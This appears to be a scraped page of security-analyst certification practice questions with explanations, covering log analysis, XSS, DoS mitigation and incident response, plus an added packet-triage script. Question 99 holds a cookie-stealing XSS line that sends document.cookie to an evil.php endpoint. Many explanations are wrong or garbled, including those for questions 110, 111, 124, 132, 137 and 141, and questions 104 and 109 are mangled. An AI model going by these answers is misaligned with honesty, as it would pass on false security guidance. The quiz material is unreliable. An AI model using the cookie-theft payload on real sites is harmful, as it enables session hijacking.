User acceptance testing was missed. UAT is the SDLC step in which the people who will actually use the application, here the accounting department, verify against their own requirements that it behaves as intended before it goes to production. Skipping it meant the first time the business users exercised the application was in production, which is exactly when the mismatch between what was built and what was needed surfaced.
97. The AUTOCOMPLETE output is not disabled in an HTML FORM/INPUT containing a password type input. Passwords may be stored in browsers and retrieved.

The analyst reviews the following code snippet:

<form action="authenticate.php">
Username:<br>
<input type="text" name="username" value="" autofocus><br>
Password:<br>
<input type="password" name="password" value="" maxlength="32"><br>
<input type="submit" value="submit">
</form>

Which of the following is the BEST course of action based on the above warning and code snippet?

Explanation

The correct answer is to update the browser Group Policy Object (GPO). The scanner is reporting that the form does not set autocomplete="off", so browsers may offer to save the password and any later user of the machine can retrieve it. Adding the attribute to the form is the obvious code change, but current browsers generally ignore autocomplete="off" on login fields and still offer to save credentials, so the attribute alone does not resolve the risk. A browser policy pushed through GPO that disables password saving is enforced regardless of what the page says, which is why it is the best course of action.
98. An analyst has initiated an assessment of an organization's security posture. As part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help accomplish this goal? (Select two.)

Explanation

Conducting Internet searches and scouring social network sites are the two techniques. Internet searches reveal what is publicly indexed about the organization: website content, news articles, public records, job postings and documents whose metadata leaks internal names or software versions. Social network sites show what employees and business partners share about their roles, projects and technology, which often exposes more than the organization intends. Together they give the external attacker's view of the organization without touching any of its systems.
99. Given the following code:

<script type="text/javascript">
var adr = '../evil.php?breadmonster=' + escape(document.cookie);
var query = "SELECT * FROM users WHERE name = 'smith'";
</script>

Which of the following types of attacks is occurring in the example above?

Explanation

The quiz's keyed answer is SQL injection: the query variable builds a SELECT against the users table from a name value, and if that value comes from the user without validation, an attacker can alter the statement and read or modify the database. Note also the first line, which appends document.cookie to a URL pointing at evil.php: that is the standard cookie-stealing payload of a cross-site scripting attack, so a reviewer seeing this snippet should treat both the query construction and the cookie exfiltration as findings.
100. A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot purchase a data loss prevention (DLP) system. Which of the following recommendations should the security analyst make to provide defense in depth against data loss? (Select three.)

Explanation

The analyst should recommend blocking personal e-mail and file-sharing sites at the web proxy, which closes the easiest channel for sending data out of the network; preventing flash drives from connecting to USB ports via Group Policy, which removes the simplest offline channel; and preventing Internet access on laptops unless they are connected to the office network or the VPN, which keeps laptop traffic inside the controls above instead of letting a user bypass them from home or a coffee shop. None of these is a DLP system, but each closes a distinct exfiltration path, and together they raise the effort required to the point where the activity is likely to be noticed.
101. Creating a lessons learned report following an incident will help an analyst to communicate which of the following information?

Explanation

A lessons learned report communicates the root cause analysis of the incident and its impact on the organization, together with the enhancements to policies and practices that follow from it. Documenting what allowed the incident to happen, what it cost, and which controls, procedures or training should change is what turns an incident response into an improvement in the organization's ability to prevent and handle the next one.
102. A security analyst has requested to see specific security information to verify whether there are any vulnerable areas in the network that can be attacked from any external IP address. Which of the following types of information would need to be provided?

Explanation

The analyst would need the firewall ACL logs. The firewall is the boundary between external addresses and the internal network, and its ACLs define which inbound traffic is permitted; the logs show which rules matched, what was allowed through and from where. Reviewing them reveals any internal services reachable from arbitrary external IP addresses, as well as denied connection attempts that indicate what attackers are probing for.
103. A company has been a victim of multiple volumetric DoS attacks. Packet capture of the offending traffic shows the following:

09:23:45.058939 IP 192.168.1.1:2562 > 170.43.30.4:0: Flags [ ], seq 1887775210:1887776670, win 512, length 1460
09:23:45.058940 IP 192.168.1.1:2563 > 170.43.30.4:0: Flags [ ], seq 1887775211:1887776671, win 512, length 1460
09:23:45.058941 IP 192.168.1.1:2564 > 170.43.30.4:0: Flags [ ], seq 1887775212:1887776672, win 512, length 1460
09:23:45.058942 IP 192.168.1.1:2565 > 170.43.30.4:0: Flags [ ], seq 1887775213:1887776673, win 512, length 1460

Which of the following mitigation techniques is MOST effective against the above attack?

Explanation

The offending packets carry a source address of 192.168.1.1, which is RFC 1918 private address space and cannot be a legitimate source for traffic arriving from the Internet: the address is spoofed. The most effective mitigation is to contact the upstream ISP and ask them to drop traffic with RFC 1918 sources before it reaches the company's link. Filtering at the company's own edge would still let the packets consume the upstream bandwidth, which is exactly what a volumetric attack targets; filtering at the ISP removes the volume from the link itself. The destination port of 0 and the sequential source ports in the capture are further signs of a generated flood rather than real sessions.
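A small triage script, added here as an example (not from the quiz or any capture tool), that parses tcpdump-style lines like those above and separates packets whose source is RFC 1918, loopback or link-local space from packets with routable sources. The capture lines are constructed: the first two mirror the quiz's packets, the third adds a 10.0.0.0/8 spoof, and the fourth is an ordinary SYN from a public address. The private ranges are listed explicitly rather than via ipaddress.is_private, because that property also covers documentation and other special-purpose ranges.

```python
"""Flag DoS packets whose source address is RFC 1918 space (added example)."""
import ipaddress
import re
from collections import Counter

# Constructed tcpdump-style lines modelled on the capture in question 103.
CAPTURE = [
    "09:23:45.058939 IP 192.168.1.1:2562 > 170.43.30.4:0: Flags [ ], seq 1887775210:1887776670, win 512, length 1460",
    "09:23:45.058940 IP 192.168.1.1:2563 > 170.43.30.4:0: Flags [ ], seq 1887775211:1887776671, win 512, length 1460",
    "09:23:45.058941 IP 10.0.0.7.40000 > 170.43.30.4.0: Flags [ ], seq 1, win 512, length 1460",
    "09:23:45.058942 IP 93.184.216.34.44512 > 170.43.30.4.443: Flags [S], seq 0, win 65535, length 0",
]

# RFC 1918 plus loopback and link-local: none of these should arrive from the Internet.
BOGON_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
]

# tcpdump separates port with "."; the quiz's rendering uses ":", so accept both.
LINE_RE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)[.:](?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)[.:](?P<dport>\d+):"
)


def parse(line):
    """Extract src/dst address and port from one capture line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        "src": ipaddress.ip_address(m["src"]),
        "sport": int(m["sport"]),
        "dst": ipaddress.ip_address(m["dst"]),
        "dport": int(m["dport"]),
    }


def is_bogon_source(pkt):
    """True when the source address belongs to a range that cannot be routed from the Internet."""
    return any(pkt["src"] in net for net in BOGON_NETS)


def triage(lines=CAPTURE):
    """Return (spoofed_count, routable_count, spoofed sources by frequency)."""
    spoofed = Counter()
    routable = 0
    for line in lines:
        pkt = parse(line)
        if pkt is None:
            continue
        if is_bogon_source(pkt):
            spoofed[str(pkt["src"])] += 1
        else:
            routable += 1
    return sum(spoofed.values()), routable, spoofed.most_common()


if __name__ == "__main__":
    print(triage())
```

The spoofed-source list is what you hand to the ISP when asking for upstream filtering; the routable remainder is what still needs to be examined for the legitimate traffic you must not block.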
104. Given the following access log:​Access _log: 10.1.1.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/a? .aspectRatio : this.orginalSize.height&7c&cl&3ba=e (HTTP/1.1" 403 22 access_log 10.2.2.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/a? .aspectRatio this. orginalSize.height |   |    1; a=e (HTTP/1.1"303 333 Access _log: 10.1.1.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/1]) ;F.optgroup=F .option;F .tbody=f .colorgroup=F /caption=F .thread; F .th=F .td; id (!c.support.htmlserialize) F.default= (1, HTTP/1.1" 403 338Which of the following accurately describes what this log displays?

105. An organization uses Common Vulnerability Scoring System (CVSS) scores to prioritize remediation of vulnerabilities. Management wants to modify the priorities based on a difficulty factor so that vulnerabilities with lower CVSS scores may get higher priority if they are easier to fix with less risk to system functionality. Management also wants to quantify the priority. Which of the following would achieve management's objective?

Explanation

The correct answer is (CVSS Score) * Difficulty = Priority, where Difficulty is a range from 1 to 10 with 10 being the easiest and lowest-risk fix to implement. Multiplying by a factor that grows with ease of remediation lets a medium-severity vulnerability with a trivial fix outrank a higher-severity one whose fix is risky or disruptive, which is what management asked for, and the product is a single number that can be used to rank the whole list.
106. A cybersecurity analyst was asked to secure the Chief Executive Officer's (CEO's) home Wi-Fi Internet segment. The segment has a server that can use directory services. Which of the following protocols would the analyst select if using WPA Enterprise?

Explanation

The correct answer is RADIUS. WPA Enterprise (802.1X) does not use a shared passphrase; the access point forwards each client's authentication to a RADIUS server, which checks the credentials, here against the directory service on the segment's server, and tells the access point whether to admit the client. Each user gets individual credentials that can be revoked without re-keying every device, which is the property that makes WPA Enterprise stronger than a pre-shared key.
107. An organization followed an SDLC process for vulnerability remediation from development (DEV) through staging (STG) to production (PROD). The organization found that this process took too long and provided no additional security value. Which of the following vulnerability management processes is the BEST approach for this organization?

Explanation

The best approach is to remediate DEV and STG concurrently, test, and then remediate PROD. Applying the fix to the two non-production environments in parallel removes a full stage from the serial pipeline, while still testing the change on representative systems before it touches production. That keeps the safeguard that matters (no untested change in PROD) and drops the one that was costing time without adding security.
108. A security analyst is performing a static code review of a web application that includes a blog. The comment section contains the following snippet:

<script>
var d = document.getElementById("userComment").value;
document.getElementById("displayComment").innerHTML = d;
</script>

Explanation

The snippet is vulnerable to cross-site scripting (XSS). The comment text is taken from user input and assigned to innerHTML, so the browser parses it as HTML rather than displaying it as text; any script tag or event-handler attribute in a comment executes in the browser of every visitor who views it. That allows session cookie theft, hijacking of the user's session or defacement of the page. The fix is to assign the text with textContent (or encode it before insertion) so that markup in the comment is shown literally.
109. After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company's computer .16:26:42.943463 IP 192.168.1.10:25 > 10.38.219.20:3389  Flags [P.] seq 1768:1901, ack1, win 511, options [nop, nop TS val 271989777 ecr 475239494], length 133will prevent further access ONLY to the unauthorized service and will not impact other services?

Explanation

The correct answer is "DENY TCP ANY HOST 10.38.219.20 EQ 3389". This rule will deny any TCP traffic from any source to the host with IP address 10.38.219.20 on port 3389. Since the unauthorized service is running on this specific port, denying traffic to this port will effectively prevent further access to the unauthorized service. The other rules mentioned in the options either deny traffic to different ports or different IP addresses, which would not be effective in stopping the unauthorized service.

110. A security analyst has noticed that a particular server has consumed over 1TB of bandwidth over the course of a month. It has port 3333 open; however, there have not been any alerts or notices regarding the server or its archives. Which of the following did the analyst discover?

Explanation

The analyst discovered a zero-day vulnerability on the server. A zero-day vulnerability refers to a security flaw that is unknown to the software vendor and does not have a patch or fix available. This vulnerability allowed the server to consume a large amount of bandwidth without triggering any alerts or notices.

111. A security analyst is conducting traffic analysis and observes an HTTP POST to a web server. The POST header is approximately 1,0000 bytes in length. During transmission, one byte is delivered every 10 seconds. Which of the following attacks is this traffic indicative of?

Explanation

The given scenario describes a situation where a large amount of data is being transmitted very slowly over an HTTP POST. This behavior is indicative of exfiltration, which refers to the unauthorized extraction of data from a network. In this case, the attacker is sending the data slowly to avoid detection and to successfully exfiltrate the information from the web server. Trickling the data out one byte at a time keeps the transfer below the volume thresholds that security monitoring typically alerts on, so sensitive data can be moved without raising suspicion.

112. An analyst is reviewing logs for a web application and discovers the following log snippet:

    https://192.168.1.100/page.asp?variable=<script>alert('Test')</script>&u=user1&p=#$^()*@&uid=1289

Which of the following vulnerabilities has been tested?

Explanation

The correct answer is XSS (Cross-Site Scripting). This vulnerability is indicated by the presence of the script tag and the alert function in the request parameter recorded in the log snippet. XSS allows attackers to inject malicious scripts into web pages viewed by other users, leading to various attacks such as stealing sensitive information or hijacking user sessions.

113. A cybersecurity analyst is reviewing the following outputs:

    root@kali:~# hping3 -S -p 80 192.168.1.19
    HPING 192.168.1.19 (eth0 192.168.1.19): S set, 40 headers + 0 data bytes
    len=46 ip=192.168.1.19 ttl=64 DF id=28319 sport=80 flags=RA seq=0 win=0 rtt=0.6 ms

    root@kali:~# hping3 -S -p 8080 192.168.1.19
    HPING 192.168.1.19 (eth0 192.168.1.19): S set, 40 headers + 0 data bytes
    len=46 ip=192.168.1.19 ttl=64 DF id=28319 sport=8080 flags=RA seq=0 win=29200 rtt=11.9 ms

Which of the following can the analyst infer from the above output?

Explanation

The analyst can infer from the output that the remote host is running a service on port 8080. This is indicated by the "sport=8080" field in the output, which shows that the remote host is responding to the hping3 packets sent to that port, together with the non-zero window size (win=29200) in that response, in contrast to the win=0 reply received from port 80.

114. A security administrator determines, several months after the first instance, that a local privileged user has been routinely logging into a server interactively as "root" and browsing the internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Select two)

Explanation

The administrator should recommend a review and modification of the log aggregation and analysis process because it took several months to detect the unauthorized activity. This suggests that the logs were not being monitored or analyzed in a timely manner. Additionally, the administrator should recommend a review and modification of the acceptable use policies because the local privileged user was browsing the internet from a root session, which may be a violation of the organization's policy.

115. Which of the following BEST explains the purpose of a data ownership policy?

Explanation

The purpose of a data ownership policy is to clearly define the roles and responsibilities between users and managers when it comes to data. It also aims to establish how specific data types should be managed. This policy ensures that everyone in the organization understands their obligations and the proper procedures for handling and protecting data.

116. An analyst was testing the latest version of an internally developed CRM system. The analyst created a basic user account. Using a few tools in Kali's latest distribution, the analyst was able to access configuration files, change permissions on folders and groups, and delete and create new system objects. Which of the following techniques did the analyst use to perform these unauthorized actions?

Explanation

The analyst used privilege escalation to perform these unauthorized actions. Privilege escalation refers to the act of gaining higher levels of access or permissions than originally granted. In this case, the analyst was able to access configuration files, change permissions, and manipulate system objects, indicating that they were able to elevate their privileges beyond what a basic user account should have allowed.

117. An analyst wants to use a command line tool to identify open ports and running services on a host, along with the application that is associated with those services and ports. Which of the following should the analyst use?

Explanation

The analyst should use netstat to identify open ports and running services on a host. Netstat is a command line tool that displays active network connections, listening ports, and routing tables. It provides information about the state of TCP/IP connections and, with the appropriate options, the processes that are using them. By using netstat, the analyst can determine which ports are open and which applications are associated with those ports.

118. While reviewing the proxy logs, the security analyst noticed a suspicious traffic pattern. Several internal hosts were observed communicating constantly with an external IP address over port 80. An incident was declared, and an investigation was launched. After interviewing the affected users, the analyst determined the activity started right after deploying a new graphics suite. Based on this information, which of the following actions would be the appropriate NEXT step in the investigation?

Explanation

The appropriate next step in the investigation would be to identify the destination IP address and its owner. This will help in determining whether the communication is legitimate (for example, the graphics suite contacting its vendor) or malicious. Additionally, examining the running processes on the affected hosts will provide further insight into the nature of the activity. This step gathers more information before any further action is taken.

119. Which of the following principles describes how a security analyst should communicate during an incident?

Explanation

The principle that describes how a security analyst should communicate during an incident is that the communication should be limited to security staff only. This means that the analyst should only share information and updates about the incident with other members of the security team who are directly involved in managing and resolving the incident. By limiting communication to trusted and knowledgeable individuals within the security staff, sensitive information is kept confidential and the incident response process can be effectively coordinated without unnecessary distractions or potential leaks of information.

120. A company invested 10 percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attacks its competitors experienced 3 months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get jobs done. Which of the following will eliminate the risk introduced by this practice?

Explanation

Investing in and implementing a solution to ensure non-repudiation will eliminate the risk introduced by users sharing their usernames and passwords. Non-repudiation ensures that the actions of a user cannot be denied or falsely attributed to someone else. By implementing this solution, the company can track and authenticate user actions, making it impossible for users to share their credentials without being identified. This will discourage the practice of sharing usernames and passwords, thereby reducing the risk of unauthorized access and potential cyber attacks.

121. A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email, and contacts to a smartphone or other personal device. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario?

Explanation

The recommended solution of developing a minimum security baseline while restricting the type of data that can be accessed would meet both the mobile data protection efforts and the business requirements. This approach allows users to synchronize their calendars, email, and contacts to their personal devices while also implementing security measures to protect sensitive data. By setting a minimum security baseline, the organization can ensure that only necessary data is accessed and reduce the risk of unauthorized access or data breaches. This solution strikes a balance between flexibility for users and maintaining security for the organization.

122. A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID "Admin" with a password of "password" grants elevated access to the application over the internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

Explanation

A manual peer review involves having experienced individuals review the code and logic of the web application. This can help identify vulnerabilities and potential weaknesses in the authentication method, such as a hard-coded or default administrative credential. A manual peer review can identify and fix this kind of issue before the application is deployed in a production environment. User acceptance testing, input validation, and stress testing may also be helpful in identifying vulnerabilities, but a manual peer review is considered the best method in this scenario.

123. Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to a security team. Which of the following frameworks would BEST support the program? (Select two)

Explanation

NIST (National Institute of Standards and Technology) and the ISO 27000 series are the best frameworks to support the organizational vulnerability management program. NIST provides a comprehensive set of security controls and guidelines that can be used to identify and mitigate vulnerabilities. The ISO 27000 series is a widely recognized international standard for information security management systems, which includes risk assessment and treatment processes to address vulnerabilities. Together, these frameworks provide a solid foundation for implementing an effective vulnerability management program.

124. A software assurance lab is performing a dynamic assessment by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing, AND during which phase of the SDLC should this occur? (Select two)

Explanation

The lab is performing fuzzing and static code analysis. Fuzzing involves inputting random data sets to test for error/failure conditions, while static code analysis involves analyzing the source code for potential issues. These activities are typically performed during the development phase of the SDLC to identify and address any vulnerabilities or bugs in the software before it is deployed.

125. A security analyst is performing a forensic analysis on a machine that was the subject of SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in the %TEMP% folder, and RDP files that had connected to external IPs. Which of the following has the security analyst uncovered?

Explanation

The security analyst has uncovered a software vulnerability. The presence of network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in the %TEMP% folder, and RDP files that had connected to external IPs indicate that the machine has been compromised by an attacker who is exploiting a vulnerability in the software. This suggests that the attacker has gained unauthorized access and is using various techniques to maintain control over the compromised machine.

126. The security operations team is conducting a mock forensics investigation. Which of the following should be the FIRST action taken after seizing a compromised workstation?

Explanation

After seizing a compromised workstation, the first action should be to implement the incident response plan. This is because the incident response plan provides a systematic approach to handling security incidents and outlines the necessary steps to mitigate the impact of the compromise. By implementing the incident response plan, the security operations team can quickly and effectively respond to the incident, contain the compromise, and start the process of investigating and remediating the issue. Activating the escalation checklist, analyzing the forensic image, and performing evidence acquisition are important steps in the overall investigation process, but they should be done after implementing the incident response plan.

127. A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops. The solution should be able to scale, provide a minimum of false positives and high accuracy of results, and be centrally managed through an enterprise console. Which of the following scanning topologies is BEST suited for this environment?

Explanation

A combination of server-based and agent-based scanning engines is the best suited scanning topology for this environment because it allows for scalability, high accuracy of results, and centralized management through an enterprise console. Server-based scanning engines can be deployed centrally and perform vulnerability scans of the centrally managed laptops, while agent-based scanning engines can be installed on the student/employee laptops to scan them individually, including when they are off the campus network. This combination ensures that all laptops are scanned for vulnerabilities, provides accurate results, and allows for efficient management through a centralized console.

128. The number of emails containing malicious attachments has increased dramatically in the last month. As a result, management has directed the security analysts to research products that can help analyze the behaviors of the malware in an isolated environment without affecting production systems. Which of the following should the security analyst recommend?

129. A threat intelligence analyst who works for a financial services firm received the report:

"There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware has been called "Lockmaster" by researchers due to its ability to overwrite the MBR, but this item is not a malware signature. Please execute a defensive operation regarding this attack vector."

The analyst ran a query and has assessed that this traffic has not been seen on the network. Which of the following actions should the analyst do NEXT? (Select two)

Explanation

The analyst should advise the firewall engineer to implement a block on the domain because the report indicates that the domain is delivering ransomware. By blocking the domain, the analyst can prevent any potential infections from occurring. Additionally, the analyst should produce a threat intelligence message to be disseminated to the company. This will inform other employees and stakeholders about the threat and provide guidance on how to respond to it effectively.

130. During a penetration test, a red team was able to collect the following data via phone:

    OS: Windows
    IP: 172.16.12.9
    Password: Apples
    AV: Norton

Which of the following threat vectors enables this collection?

Explanation

The red team was able to collect the data via phone, which suggests that they were able to trick or deceive someone into providing the information. Phishing is a common method used to trick individuals into revealing sensitive information such as passwords or personal details. It involves sending fraudulent emails or messages that appear to be from a legitimate source, in order to trick the recipient into providing the requested information. In this case, the red team was likely able to collect the data by using phishing techniques to deceive the target into revealing their OS, IP, password, and AV information.

131. An organization is requesting the development of a disaster recovery plan. The organization has grown, and so has the infrastructure. Documentation, policies, and procedures do not exist. Which of the following steps should be taken to assist in the development of the disaster recovery plan?

Explanation

To assist in the development of a disaster recovery plan for an organization that lacks documentation, policies, and procedures, conducting a risk assessment is the most appropriate step. A risk assessment will help identify potential threats and vulnerabilities, allowing the organization to prioritize its resources and efforts in developing a comprehensive disaster recovery plan. This step will provide a foundation for understanding the risks and developing strategies to mitigate them effectively. It is crucial to assess the risks before proceeding with other steps such as developing a data retention policy, executing vulnerability scanning, or identifying assets.

132. Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement?

Explanation

A forensic analysis report is a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated. It also includes information on incident response effectiveness and any identified gaps needing improvement. This report is used to provide a comprehensive analysis of the incident, including the timeline of events, the extent of the damage, and the effectiveness of the response. It is a crucial document in incident response and can be used for future reference and improvement.

133. Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Select two)

Explanation

Segmentation and firewalling are the most effective remediation strategies in reducing the risk of a network-based compromise of embedded ICS. Segmentation involves dividing the network into smaller, isolated segments to limit the potential impact of an attack. This helps to contain any compromise within a specific segment and prevents lateral movement. Firewalling involves implementing firewalls to filter and control network traffic, allowing only authorized connections and blocking malicious traffic. This helps to protect the network and prevent unauthorized access to or communication with the embedded ICS devices.

134. An analyst finds that unpatched servers have undetected vulnerabilities because the vulnerability scanner does not have the latest set of signatures. Management directed the security team to have personnel update the scanners with the latest signatures at least 24 hours before conducting a scan, but the outcome is unchanged. Which of the following is the BEST logical control to address the failure?

135. Considering confidentiality and integrity, which of the following makes servers more secure than desktops?

Explanation

The operating system (OS) plays a crucial role in enhancing the security of servers compared to desktops. Servers typically use specialized server operating systems that are designed with robust security features and protocols. These OSs offer better protection against unauthorized access, malware, and other security threats. Additionally, physical access restrictions, such as secure data centers and restricted entry, further enhance server security by preventing unauthorized individuals from physically accessing the server hardware.

136. The new Chief Technology Officer (CTO) is seeking recommendations for network monitoring services for the local internet. The CTO would like the capability to monitor all traffic to and from the gateway, as well as the ability to block certain content. Which of the following recommendations would meet the needs of this organization?

137. An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

Explanation

The indicator of a likely false positive in this scenario is when the reports show the scanner compliance plug-in is out-of-date. This suggests that the vulnerability scanner may not be accurately identifying vulnerabilities due to its outdated status. Therefore, the organization can consider this as a false positive and focus on other vulnerabilities that are more reliable and up-to-date.

138. Which of the following has occurred

139. Which of the following represents the reasoning behind careful planning of the timelines and time-of-day boundaries for an authorized penetration test?

Explanation

The careful planning of timelines and time boundaries for an authorized penetration test is important to mitigate any unintended impacts to operations. By scheduling the test activities, personnel resources can be allocated efficiently. Additionally, determining the frequency of team communication and reporting ensures effective coordination and monitoring of the test. By avoiding conflicts with real intrusions that may occur, the test can be conducted without causing disruptions or confusion. Lastly, ensuring that the test has a measured impact on operations helps in assessing the effectiveness of the test and identifying areas for improvement.

140. Which of the following actions should occur to address any open issues while closing an incident involving various departments within the network?

Explanation

The correct answer is "none of the above" because the actions mentioned in the options (incident response plan, lessons learned report, reverse engineering process, chain of custody documentation) do not directly address open issues while closing an incident involving various departments within the network. These options may be relevant in other stages of incident response or for different purposes, but they are not specifically focused on addressing open issues during the closure of an incident.

141. An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirements? (Select three)

Explanation

The analyst was asked to recommend technologies that are PKI X.509 compliant for secure functions. 3DES, AES, and SSL/TLS meet the compatibility requirements. 3DES (Triple Data Encryption Standard) is a symmetric encryption algorithm that provides strong security. AES (Advanced Encryption Standard) is also a symmetric encryption algorithm that is widely used and considered secure. SSL/TLS (Secure Sockets Layer/Transport Layer Security) are protocols that provide secure communication over the internet. These technologies all support PKI X.509 and can be used for secure functions.

142. A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis?

Explanation

To ensure the integrity of the hard drive while performing the analysis, the security analyst should first make a copy (forensic image) of the hard drive. Creating a copy ensures that the original evidence remains untouched and unaltered, allowing the analyst to work with the copy without compromising the integrity of the original data. Any changes made during the analysis will only affect the duplicate, preserving the integrity of the original evidence.

Quiz Review Timeline (Updated): Mar 22, 2023 +

Current version: Mar 22, 2023, quiz edited by ProProfs Editorial Team
Oct 11, 2017: quiz created by Heavenlymixed86
Cancel
  • All
    All (142)
  • Unanswered
    Unanswered ()
  • Answered
    Answered ()
An analyst is observing unusual network traffic from a workstation....
Which of the following is MOST effective for correlation analysis by...
The director of software development is concerned with recent web...
After analyzing ad correlating  activity from multiple sensors,...
The director of software development is concerned with recent web...
Which of the following commands would a security analyst use to make a...
As part of upcoming engagement for client, an analyst is configuring a...
An Administrator has been investigating the way in which an actor has...
Management is concerned with administrator access from outside the...
An administrator has been investigating the way in which an actor had...
The Chief Information Security Officer (CISO) has asked the security...
A security analyst has determined that the user interface on an...
A company has recently launched a new billing invoice for a few key...
A blue team hunted for identified a previously unknown malicious...
A cybersecurity analyst traced the source of an attack to compromised...
A cybersecurity analyst is conduction a security test to ensure the...
A recent vulnerability scan found four vulnerabilities on an...
During a routine review of firewall logs, an analyst identified that...
A recent audit has uncovered several coding errors and a lack of input...
A cybersecurity analyst has received a report that multiple systems...
While a threat intelligence analyst was researched an indicator of...
During the post-seizure analysis of a workstation, the technician...
A system Administrator has reviewed the following output#nmap...
A security analyst has been asked to remediate a server...
File integrity monitoring states the following files have been change....
A cybersecurity analyst has identified a new mission-essential...
Nmap scan results on a set of IP addresses returned one or more lines...
An executive tasked a security analyst to aggregate past lost, traffic...
An organization wants to harden its web servers. As part of this goal,...
A technician is running an intensive vulnerability scan to detect...
Which of the following BEST describes the offensive participants in a...
An HR employee began having issues with a device becoming unresponsive...
A security analyst is creating baseline system images to remediate...
A threat intelligence feed has posted an alert stating there is a...
A small bank employs an administrator who manages configurations,...
A system administrator who was using an account with elevated...
A company that is hiring a penetration tester want to exclude social...
Which of the following are essential components within the rules of...
An organization has recently recovered from an incident where a...
A security analyst wants to scan the network for active hosts. Which...
Which of the following is a feature if virtualization that can...
A security audit revealed that port 389 has been used instead of 636...
A cyber security analyst has several log files to review. Instead of...
A security analyst is reviewing IDS logs and notices the following...
A reverse engineer was analyzing malware found on a retailers network...
A software patch has been released to remove vulnerabilities from...
A cybersecurity has received a laptop of a user who recently left the...
As part of the SDLC, software developers are testing the security of a...
A technician is running an intensive vulnerability scan to detect...
Which of the following best practices is used to identify areas in the...
After running a packet analyzer on the network, a security has notice...
A vulnerability scan has returned the following informationDetailed...
A security analyst is adding input to the incident response...
A security analyst is preforming a review of Active directory and...
Company A permits visiting business patterns from a Company B to...
When preparing for a third-party audit, the vice president of risk...
An analyst has received unusual alerts on the SIEM dashboard. The...
A cybersecurity professional typed in a URL an discovered the admin...
A security analyst has created an image of a drive from an incident....
A cyber security analyst is completing an organizations vulnerability...
A cybersecurity analyst was hired to resolve a security issue within a...
Following a security breach, a post-mortem was done to analyze the...
A security analyst has noticed an alert from the SIEM. A workstation...
A security administrator recently deployed and verified the...
A security analyst received a compromised workstation. The...
AN alert has been distributed throughout the information security...
Law enforcement has contacted a corporation's legal counsel...
A company wants to update its acceptable use policy (AUP) to ensure it...
A security professional is analyzing the results of a network...
A cybersecurity analyst is retained by a firm from an open...
A security analyst is reviewing the following log after enabling...
An organization is attempting to harden its web server and reduce the...
Which of the following tools should a cybersecurity analyst use to...
A cybersecurity analyst has run a vulnerability scan and found...
External users are reporting that a web application is slow and...
The help desk informed a security analyst of a trend that is beginning...
A new policy requires the security team to preform web applications...
During a review of security controls, an analyst was able to an...
In order to meet regulatory compliance objectives for the storage of...
A threat intelligence analyst who works for a technology firm received...
An incident report indicated a virus was introduced though a remote...
A malicious user is receiving the following output​root:~#ping...
A cybersecurity analyst has several SIEM event logs to review for...
A security analyst is to configure a vulnerability scan for a new...
An application development company released da new version of its...
A security analyst of a small regional back has received an alert that...
A security analyst has been notified by the IDS that website XYZ is...
The Chief Information Officer (CIO) of a company has been receiving an...
A cybersecurity analyst has received an alert that well-known...
A security administrator for a bank branch office performed a routine...
After completing a vulnerability scan, the following output was...
Following a data compromise, a cybersecurity analyst noticed the...
A cybersecurity analyst is currently investigating a server outage....
A company is running Microsoft on a file server. A vulnerability scan...
A security analyst is reviewing logs and discovers that a...
The software development team pushed a new web application into...
The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing...
An analyst has initiated an assessment of an organization's...
Given the following code:<script...
A security analyst is concerned that employees may attempt to...
Creating a lessons learned report following an incident will help an...
A security analyst has requested to see specific security information...
A company has been a victim of multiple volumetric DoS attacks. Packet...
Given the following access log: Access_log: 10.1.1.3 - - [...
An organization uses common Vulnerability Scoring System (CVSS) scores...
A cybersecurity analyst was asked to secure the Chief Executive...
An organization followed an SDLC process for vulnerability remediation...
A security analyst is performing a static code review of a web...
After reviewing the following packet, a cybersecurity analyst has...
A security analyst has noticed that a particular server has consumed...
A security analyst is conducting traffic analysis and observes an...
An analyst is reviewing logs for a web application and discovers the...
A cybersecurity analyst is reviewing the following...
A security administrator determines several months after the first...
Which of the following BEST explains the purpose of data ownership...
